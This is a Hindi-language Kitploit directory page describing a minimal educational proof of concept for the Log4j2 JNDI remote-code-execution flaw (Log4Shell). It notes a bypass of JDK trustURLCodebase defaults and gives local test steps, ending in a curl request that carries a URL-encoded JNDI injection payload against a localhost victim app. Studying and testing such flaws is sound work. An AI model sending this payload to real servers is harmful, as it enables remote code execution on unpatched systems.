Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j2-rce-poc — Log4j2 JNDI RCE कमजोरी (CVE-2021-44228/Log4Shell) के लिए एक न्यूनतम प्रूफ-ऑफ-कॉन्सेप्ट। | Kitploit
उपकरण/GitHubGitHub/unlimitedsola/log4j2-rce-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

Log4j2 JNDI RCE कमजोरी (CVE-2021-44228/Log4Shell) के लिए एक न्यूनतम प्रूफ-ऑफ-कॉन्सेप्ट।

रिपॉजिटरी देखें
324 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j2 RCE भेद्यता POC

यह Log4j2 JNDI रिमोट-कोड-एक्जीक्यूशन भेद्यता (CVE-2021-44228) के लिए एक न्यूनतम proof-of-concept है। यह शैक्षिक उद्देश्यों के लिए है ताकि जो लोग सुरक्षा शोधकर्ता नहीं हैं, वे समझ सकें कि यह कैसे काम करता है और इसका प्रभाव कितना बड़ा है।

POC com.sun.jndi.rmi.object.trustURLCodebase और com.sun.jndi.cosnaming.object.trustURLCodebase प्रॉपर्टीज़ को true पर सेट करने की आवश्यकता को दरकिनार करता है, जो 8u121, 7u131, 6u141 से डिफ़ॉल्ट रूप से अक्षम कर दी गई थीं।

आवश्यक शर्तें

  • JDK 1.8

नोट: payload-server को कंपाइल करने के लिए JDK 1.8 आवश्यक है, लेकिन victim-app JDK 15 तक भेद्य है क्योंकि [JDK 15 में Nashorn इंजन हटा दिया गया था][]।

परीक्षण करने के लिए

  1. payload-server को चलाने के लिए निम्नलिखित चलाएँ:
root@kitploit:~
$ ./gradlew runPayloadServer
  1. एक नया टर्मिनल सत्र खोलें और victim-app प्रारंभ करें:
root@kitploit:~
$ ./gradlew runVictimApp
  1. RCE को ट्रिगर करने के लिए curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D चलाएँ।
  2. यह प्रमाणित करने के लिए कि रिमोट कोड निष्पादित हुआ है, victim-app का कंसोल लॉग जांचें। आपको स्क्रीन पर एक अनपेक्षित लॉग मुद्रित दिखाई देना चाहिए।
टूल डाउनलोड करें